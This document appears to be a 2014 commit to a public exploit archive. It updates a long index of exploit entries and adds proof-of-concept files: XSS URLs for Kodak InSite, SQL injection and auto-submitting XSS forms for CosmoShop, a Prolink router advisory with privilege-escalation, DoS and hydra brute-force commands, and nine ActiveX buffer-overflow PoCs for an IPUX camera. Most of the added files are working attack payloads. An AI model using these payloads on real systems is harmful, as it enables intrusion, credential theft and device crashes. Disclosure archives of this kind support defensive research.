Updated 12_03_2014

2014-12-03 04:52:35 +00:00 · 2014-12-03 04:52:35 +00:00 · 5a0a6520d2
commit 5a0a6520d2
parent 4895daea3f
21 changed files with 1663 additions and 4 deletions
--- a/files.csv
+++ b/files.csv
@ -28757,7 +28757,7 @@ id,file,description,date,author,platform,type,port
 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80
 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
-31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0
+31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,"Juan Sacco",windows,local,0
 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
@ -30577,7 +30577,7 @@ id,file,description,date,author,platform,type,port
 33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0
 33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0
 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
-33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
+33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,"Juan Sacco",php,webapps,80
 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
@ -31176,7 +31176,7 @@ id,file,description,date,author,platform,type,port
 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0
 34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0
 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0
-34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80
+34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,"Juan Sacco",php,webapps,80
 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900
 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0
@ -31736,7 +31736,7 @@ id,file,description,date,author,platform,type,port
 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
-35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation",2014-11-14,skynet-13,linux,local,0
+35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Privilege Escalation",2014-11-14,skynet-13,linux,local,0
 35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
 35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
@ -31892,3 +31892,23 @@ id,file,description,date,author,platform,type,port
 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0
 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0
 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 Pages/login.aspx Language Parameter XSS",2011-03-07,Dionach,asp,webapps,0
 35413,platforms/php/webapps/35413.php,"WordPress <=4.0 Denial of Service Exploit",2014-12-01,SECURELI.com,php,webapps,80
 35414,platforms/php/webapps/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
 35415,platforms/php/webapps/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 'basicstats.php' Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
 35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 'admin/upload-controler.php' Remote Arbitrary File Upload Vulnerability",2011-03-08,"AutoSec Tools",php,webapps,0
 35418,platforms/php/webapps/35418.txt,"Inline Gallery WordPress Plugin 0.3.9 'do' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35419,platforms/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps,0
 35420,platforms/hardware/webapps/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2011-03-09,KedAns-Dz,osx,remote,0
 35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 'image' Parameter Cross Site Scripting Vulnerability",2011-03-10,"High-Tech Bridge SA",php,webapps,0
 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0
 35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service Vulnerability",2011-02-09,"Rodrigo Escobar",multiple,dos,0
 35438,platforms/cgi/webapps/35438.txt,"CosmoShop V10.05.00 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
--- a/platforms/asp/webapps/35411.txt
+++ b/platforms/asp/webapps/35411.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/46762/info
 Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 Kodak InSite 5.5.2 is vulnerable; other versions may also be affected. 
 http://www.example.com/Troubleshooting/DiagnosticReport.asp?HeaderWarning=<script>alert("XSS!")</script>&Language=en&rflp=true#
--- a/platforms/asp/webapps/35412.txt
+++ b/platforms/asp/webapps/35412.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/46762/info
 Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 Kodak InSite 5.5.2 is vulnerable; other versions may also be affected. 
 http://www.example.com/Pages/login.aspx?SessionTimeout=False&Language=de%26rflp=True&#039;,&#039;00000000-0000-0000-0000-000000000000&#039;); alert(&#039;XSS!&#039;); return false; a(&#039;
--- a/platforms/cgi/webapps/35438.txt
+++ b/platforms/cgi/webapps/35438.txt
@ -0,0 +1,54 @@
 source: http://www.securityfocus.com/bid/46828/info
 CosmoShop is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 CosmoShop ePRO V10.05.00 is vulnerable; other versions may also be affected. 
 http://www.example.com/cgi-bin/admin/index.cgi?action=menu&id=eco'+SQL_CODE&hId=eco
 <form action="http://www.example.com/cgi-bin/admin/edit_startseitentext.cgi" method="post" name="main" enctype="multipart/form-data">
 <input type="hidden" name="setup" value="allgemein">
 <input type="hidden" name="action" value="save">
 <input type="hidden" name="use_wwe" value="1">
 <input type="hidden" name="file-de" value="startseitentext_de.txt">
 <input type="hidden" name="text-de" value='page html"><script>alert(document.cookie)</script>'>
 </form>
 <script>
 document.main.submit();
 </script>
 http://www.example.com/cgi-bin/admin/rubrikadmin.cgi?action=edit&rubnum=angebote&rcopy="><script>alert(document.cookie)</script>&expand=,angebote
 http://www.example.com/cgi-bin/admin/artikeladmin.cgi?action=artikelsuche&typ=bearbeiten"><script>alert(document.cookie)</script>&hId=daten.artikel
 http://www.example.com/cgi-bin/admin/shophilfe_suche.cgi?sprache=de&suchbegriff=1"><script>alert(document.cookie)</script>
 <form action="http://www.example.com/cgi-bin/admin/setup_edit.cgi" method="post" name="main">
 <input type="hidden" name="setup" value="allgemein">
 <input type="hidden" name="hId" value="setup.einstellungen.allgemein">
 <input type="hidden" name="setup_key" value="allgemein">
 <input type="hidden" name="shoptitel" value="Cosmoshop Shopsoftware 10.x">
 <input type="hidden" name="shopbetreiber" value="email@example.com">
 <input type="hidden" name="shop_bestellempfaenger" value="email@example.com">
 <input type="hidden" name="anfrage_mail" value="email@example.com">
 <input type="hidden" name="shop_umstid" value="DE12345678">
 <input type="hidden" name="shop_eg" value="1">
 <input type="hidden" name="auftragszaehler" value="1">
 <input type="hidden" name="hauptwaehrung" value='EUR"><script>alert(document.cookie)</script>'>
 <input type="hidden" name="nebenwaehrung" value="$">
 <input type="hidden" name="eurofaktor" value="0.7">
 <input type="hidden" name="mindestpreisdm" value="10">
 <input type="hidden" name="emis_bestellempfaenger" value="">
 <input type="hidden" name="afs_bestellempfaenger" value="">
 <input type="hidden" name="ean_in_ausf" value="1">
 <input type="hidden" name="google_verify_code" value="">
 <input type="hidden" name="save_it" value="abspeichern">
 </form>
 <script>
 document.main.submit();
 </script>
--- a/platforms/hardware/webapps/35419.txt
+++ b/platforms/hardware/webapps/35419.txt
@ -0,0 +1,273 @@
 Exploit Title: Prolink PRN2001 Multiple Vulnerabilities
 1. -Advisory Information-
 Title: Prolink PRN2001 Multiple Vulnerabilities
 Firmware: Ver 1.2
 Firmware URL: http://www.prolink2u.com/download/fw/fw_PRN2001_V1.2_20130323.zip
 Vendor Homepage: http://www.prolink2u.com/
 Author: Herman Groeneveld aka sh4d0wman
 Tested On: Windows 7 / Kali
 Date published: Dec 01 2014
 Release mode: Coordinated release
 2. -Vulnerability Information-
 PROLiNK® PRN2001 Wireless- N Broadband AP / Router is the ideal wireless solution most suited for home and small-businesses. Designed to support wireless speeds of up to 150Mbps, the PRN2001 offers stellar performance on the 2.4GHz frequency band. This top-notch home networking device functions as an Access Point, Router or a Universal Repeater.
 Multiple vulnerabilities have been discovered in this router. The majority require a valid account on the device to exploit. Default credentials are: admin/password
 In the default configuration all vulnerabilities are restricted to exploitation over the LAN/WLAN interfaces. A successful compromise would give an attacker full control over the device. This would enable an attacker to enable remote device management over the WAN interface. 
 3. - Technical Description / Proof of Concept Code -
 Introduction:
 The following type of vulnerabilities have been discovered in the device:
 - 3.1: CWE-286: Incorrect User Management
 - 3.2: CWE-668: Exposure of Resource to Wrong Sphere
 - 3.3: CWE-200: Information Exposure
 - 3.4: CWE- 80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
 - 3.5: CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service
 - 3.6: CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration
 Technical Description:
 --------------------------------------------------------------
 3.1 -Class: CWE-286: Incorrect User Management- 
 Description: insufficient separation of privileges. Any account with user-level privileges has the following privileges in the web-management interface:
 - Create new users with administrative privileges 
 - Upgrade the device firmware
 - Download and upload configuration files
 PoC: users could escalate their privileges by creating a new account.
 --------------------------------------------------------------
 3.2 -CWE-668: Exposure of Resource to Wrong Sphere-
 Description: a user-level account is not restricted from exporting or importing a device configuration file. The configuration file "config.img" is stored as plain-text XML. This is the root cause for the following vulnerabilities:
 ---------------------------------------------------------------
 Name: privilege escalation through device configuration file
 Description: the plaintext XML configuration file leaks the administrative user and password of the device giving an attacker full control over the device. 
 PoC: administrative accounts have Flag value 0x0:
 <chain N="USERNAME_PASSWORD">
 <V N="FLAG" V="0x0"/>
 <V N="USERNAME" V="admin"/>
 <V N="PASSWORD" V="password"/>
 <V N="PRIORITY" V="0x2"/>
 </chain>
 ---------------------------------------------------------------
 Name: telnet privilege escalation through device configuration file
 Description: in the plaintext XML configuration file any administrative user account is set to: <V N="PRIORITY" V="0x2"/>. When this value is changed to <V N="PRIORITY" V="0x1"/> the account gains the following additional command options in a telnet shell:
 - chksum: Check sum checking. Syntax: chksum address length
 - dhcp: Enable DHCP client
 - disable: Turn off privileged commands
 - enable: Turn on privileged commands
 - loaddll: Unknown functionality / DoS: issuing loaddll crashes the device
 - script: Run specified script
 - system: Show general system information
 - webdll: Unknown functionality
 - xfile: File copy functionality
 - xip: Resolve dns
 --------------------------------------------------------------
 3.3 -CWE-200: Information Exposure-
 Description: the device is leaking various kinds of sensitive information which can aid the attacker in vulnerability discovery and/or escalate privileges.
 Vulnerable Functions:
 --------------------------------------------------------------
 Name: configuration-file sensitive information disclosure
 Description: the XML configuration file "config.img" can be exported by user-level accounts and is stored as plain-text. The following sensitive information is leaked:
 Confidentiality Related:
 - Plaintext administrative credentials 
 - Plaintext user-level credentials
 - Plaintext PPoE WAN credentials
 - Plaintext WEP key | WPA PSK | WSC Pin
 Device Integrity Related:
 - Create, Modify or Delete accounts:
 PoC: change anything inside the chain or delete the complete chain:
 <chain N="USERNAME_PASSWORD">
 <V N="FLAG" V="0x0"/>
 <V N="USERNAME" V="admin"/>
 <V N="PASSWORD" V="password"/>
 <V N="PRIORITY" V="0x2"/>
 </chain>
 - Enabling Device Management over WAN:
 PoC: modify NATRULE_INSRC_STATIC to allow web and or telnet device management over the WAN port.
 - DNS traffic redirection:
 PoC: modify DHCP Assigned DNS settings to point clients to a rogue DNS server.
 --------------------------------------------------------------
 Name: log-file sensitive information disclosure
 Description: logging is disabled by default. When it is enabled any valid user-level or administrative accounts can view this log through the web-management interface. Invalid logon attempts show the username and invalid passwords in plaintext. If a user does misspell his password an attacker has a high chance of guessing the correct password.
 Data Exposed:
 - Usernames
 - Passwords (partial)
 --------------------------------------------------------------
 Name: telnet sensitive information disclosure
 Description: the telnet command "show web" lists the complete web structure which can aid an attacker in vulnerability discovery. 
 PoC: the following URL's are leaked and not available through the default web-management interface:
 - dhcpvendortbl_withoutcheck.htm
 - debug.htm
 --------------------------------------------------------------
 3.4 -CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)-
 Description: the web-based device management interface is vulnerable to persistent XSS attacks caused by insufficient input validation. A valid account on the router is needed to exploit the vulnerabilities. 
 Vulnerable Functions:
 --------------------------------------------------------------
 URL: ddns.htm
 Field(s): hostname, username
 PoC: insert into both fields: <script>alert(String.fromCharCode(88,83,83));</script>
 XSS Execution: 
 - When the dyndns settings page is requested in the web-interface
 - if logging is enabled: loading the system log in the web-interface
 --------------------------------------------------------------
 URL: login.htm
 Fields: username
 PoC: insert as username: <script>alert(String.fromCharCode(88,83,83));</script>
 XSS Execution:
 - if logging is enabled: loading the system log in the web-interface
 -------------------------------------------------------------- 
 URL: config.img
 Field(s): any of the above values but modified through the configuration file (XML).
 Description: the configuration file is stored in plain-text. Above injection can be carried out by inserting the XSS test-string into XML elements. Execution takes place inside the web-management interface when browsed to the vulnerable url's.
 XSS Execution:
 - same locations as previous disclosed injections but in XML, username injection example:
 <V N="USERNAME" V="[XSS Inject Here]"/>
 <V N="PASSWORD" V="test"/>
 --------------------------------------------------------------
 3.5 -CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service-
 Description: un-authenticated and authenticated users can perform various actions which result in the router crashing and rebooting. In this process all LAN, WAN and Wireless connections are dropped.
 Vulnerable Functions:
 --------------------------------------------------------------
 Name: Unauthenticated device DoS
 Description: sending a request to [device ip]/autboot.htm in the web-management interface will initiate a factory-default reboot. In this process all LAN, WAN and Wireless connections are dropped. Device settings however remain unchanged.
 PoC: GET request to [deviceip]/autoboot.htm
 --------------------------------------------------------------
 Name: Authenticated device DoS through invalid firmware update
 Description: authenticated users could crash the device by uploading a large file as firmware upgrade. The device has no checks in place before the upload is accepted. After a certain amount of data is uploaded the device will initiate a reboot, most likely to resource exhaustion of either the memory or local disk space.
 PoC: upload any big file as firmware image
 --------------------------------------------------------------
 Name: Authenticated Telnet custom command device DoS
 Description: various custom telnet commands can be unlocked through the configuration file. Executing the "loaddll" command without any parameters will crash and reboot the device.
 PoC: gain special privileges and issue the loaddll inside the telnet shell
 --------------------------------------------------------------
 Name: Authenticated NTP Date HTTP Request device DoS
 Description: the web-management interface allows time configuration by authenticated users. If certain parts are modified the device will crash and reboot.
 PoC: POST form2systime.cgi?year=1975&month=Jan&day=1&hour=0&min=19&sec=24&daylightsaving=6&submit.htm%3Ftime.htm=send
 Insert junk (for example: A*400) in Year, Month or Day and the device will crash.
 --------------------------------------------------------------
 3.6 -CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration-
 Description: various configuration settings do not conform to general recommended security best practices weakening the device's security posture. 
 Vulnerable Functions:
 --------------------------------------------------------------
 Name: configuration error 
 Description: when new user accounts are created through the web-management interface the default permissions are root-level and these can't be changed to user-level. However intercepting the HTTP request and modifying the permissions parameter to user-level results in the creation of a user account with user-level privileges. Parts of the web management interface will be restricted.
 PoC: enter a valid name and password, change the privilege level to 1 (root priv) or 2 (user priv):
 username=[name]&privilege=[2]&newpass=[pass]&confpass=[pass]&adduser=Add&hiddenpass=$submit.htm%Fuserconfig.htm=Send
 --------------------------------------------------------------
 Name: unencrypted device management protocols
 Description: the router can be managed either through the web-management interface which sends HTTP traffic or by Telnet. Both protocols use plaintext communications which could allow an attacker to intercept and/or modify this traffic.
 --------------------------------------------------------------
 Name: password complexity and lockout policy
 Description: no password complexity is enforced, the minimum length is 1 character. No lockout mechanism does exist for the web-management interface. This enables an attacker to guess a correct username / password combination through password guessing or brute-forcing. Weak passwords give an attacker a higher chance of success.
 The telnet service features a lockout policy; it disconnects any client after three wrong login attempts.
 PoC: hydra [ip] -l admin -P /root/Desktop/pass.txt -f -v -t 1 http-post-form '/login.cgi:username=^USER^&password=^PASS^&submit.htm%3Flogin.htm=Send:F=Username or password error'
 --------------------------------------------------------------
 4. -Vendor Information, Solutions and Workarounds-
 Date 10-10-2014 - Vulnerabilities discovered
 Date 20-10-2014 - Contacted vendor by e-mail for responsble disclosure, informed them of release date December 1st 2014
 		  No Reply
 Date 01-11-2014 - Contacted vendor by e-mail
 		  No Reply
 Date 15-11-2014 - Contacted vendor by e-mail
 		  No Reply
 Date 01-12-2014 - Public Disclosure
 5. -Author-
 This vulnerability was discovered and researched by: Herman Groeneveld aka sh4d0wman
 I am a freelance security consultant / researcher based in Phnom Penh
 Looking for career opportunities, fellow researchers, help in unpacking the encrypted firmware :-)
 herman_worldwide [at] hotmail [.co]m
--- a/platforms/hardware/webapps/35420.txt
+++ b/platforms/hardware/webapps/35420.txt
@ -0,0 +1,273 @@
 ?
 IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow
 Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
 Product web page: http://www.ipux.net | http://www.fitivision.com
 Affected version: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)
 Summary: The device is Day and Night Cube Network camera with CMOS sensor. With
 Motion JPEG video compression, the file size of video stream is extremely reduced,
 as to optimize the network bandwidth efficiency. It has 3X digital zoom feature for
 a larger space monitoring. The ICS303C comes with a IR-cut filter and 4 built-in IR
 illuminators for both day and night applications.
 Desc: The UltraMJCam ActiveX Control 'UltraMJCamX.ocx' suffers from a stack buffer
 overflow vulnerability when parsing large amount of bytes to several functions in
 UltraMJCamLib, resulting in memory corruption overwriting several registers including
 the SEH. An attacker can gain access to the system of the affected node and execute
 arbitrary code.
 ----------------------------------------------------------------------------------
 (48d0.2e98): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraMJCamX.ocx - 
 eax=41414149 ebx=00000001 ecx=00002e98 edx=02636d5b esi=41414141 edi=02636d5b
 eip=7796466c esp=0038ebf4 ebp=0038ec28 iopl=0         nv up ei pl zr na pe nc
 cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 ntdll!RtlDeleteCriticalSection+0x77:
 7796466c 833800          cmp     dword ptr [eax],0    ds:002b:41414149=????????
 ----------------------------------------------------------------------------------
 Tested on: Microsoft Windows 7 Professional SP1 (EN)
 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience
 Advisory ID: ZSL-2014-5214
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5214.php
 16.11.2014
 ---
 Properties:
 -----------
 FileDescription		UltraMJCam ActiveX Control
 FileVersion		1, 0, 52, 23
 InternalName		UltraMJCamX
 OriginalFileName	UltraMJCamX.ocx
 ProductName		UltraMJCam device ActiveX Control
 ProductVersion		1, 0, 52, 23
 List of members:
 ----------------
 Interface IUltraMJCamX : IDispatch
 Default Interface: True
 Members : 65
 	RemoteHost
 	RemotePort
 	AccountCode
 	GetConfigValue
 	SetConfigValue
 	SetCGIAPNAME
 	Password
 	UserName
 	fChgImageSize
 	ImgWidth
 	ImgHeight
 	SnapFileName
 	AVIRecStart
 	SetImgScale
 	OpenFolder
 	OpenFileDlg
 	TriggerStatus
 	AVIRecStatus
 	Event_Frame
 	PlayVideo
 	SetAutoScale
 	Event_Signal
 	WavPlay
 	CGI_ParamGet
 	CGI_ParamSet
 	MulticastEnable
 	MulticastStatus
 	SetPTUserAllow
 	SetLanguage
 	TimestampEnable
 	TimestampStroke
 Vulnerable members of the class:
 --------------------------------
 RemoteHost
 AccountCode
 SetCGIAPNAME
 Password
 Username
 SnapFileName
 OpenFolder
 CGI_ParamGet
 CGI_ParamSet
 PoC(s):
 -------
 ---1
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Property Let RemoteHost As String"
 memberName = "RemoteHost"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 1
 arg1=String(1044, "A")
 target.RemoteHost = arg1
 </script>
 </html>
 ---2
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Property Let AccountCode As String"
 memberName = "AccountCode"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 1
 arg1=String(3092, "A")
 target.AccountCode = arg1
 </script>
 </html>
 ---3
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Property Let SetCGIAPNAME As String"
 memberName = "SetCGIAPNAME"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 1
 arg1=String(3092, "A")
 target.SetCGIAPNAME = arg1
 </script>
 </html>
 ---4
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Property Let Password As String"
 memberName = "Password"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 1
 arg1=String(2068, "A")
 target.Password = arg1
 </script>
 </html>
 ---5
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Property Let UserName As String"
 memberName = "UserName"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 1
 arg1=String(4116, "A")
 target.UserName = arg1
 </script>
 </html>
 ---6
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Property Let SnapFileName As String"
 memberName = "SnapFileName"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 1
 arg1=String(4116, "A")
 target.SnapFileName = arg1
 </script>
 </html>
 ---7
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Function OpenFolder ( ByVal sInitPath As String ) As String"
 memberName = "OpenFolder"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 1
 arg1=String(5140, "A")
 target.OpenFolder arg1 
 </script>
 </html>
 ---8
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Function CGI_ParamGet ( ByVal sGroup As String ,  ByVal sName As String ) As String"
 memberName = "CGI_ParamGet"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 2
 arg1=String(4116, "A")
 arg2="defaultV"
 target.CGI_ParamGet arg1 ,arg2 
 </script>
 </html>
 ---9
 <html>
 <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
 prototype  = "Function CGI_ParamSet ( ByVal sGroup As String ,  ByVal sName As String ,  ByVal SVal As String ) As Long"
 memberName = "CGI_ParamSet"
 progid     = "UltraMJCamLib.UltraMJCamX"
 argCount   = 3
 arg1=String(10260, "A")
 arg2="defaultV"
 arg3="defaultV"
 target.CGI_ParamSet arg1 ,arg2 ,arg3 
 </script>
 </html>
--- a/platforms/hardware/webapps/35421.txt
+++ b/platforms/hardware/webapps/35421.txt
@ -0,0 +1,175 @@
 IPUX CL5452/CL5132 IP Camera (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow
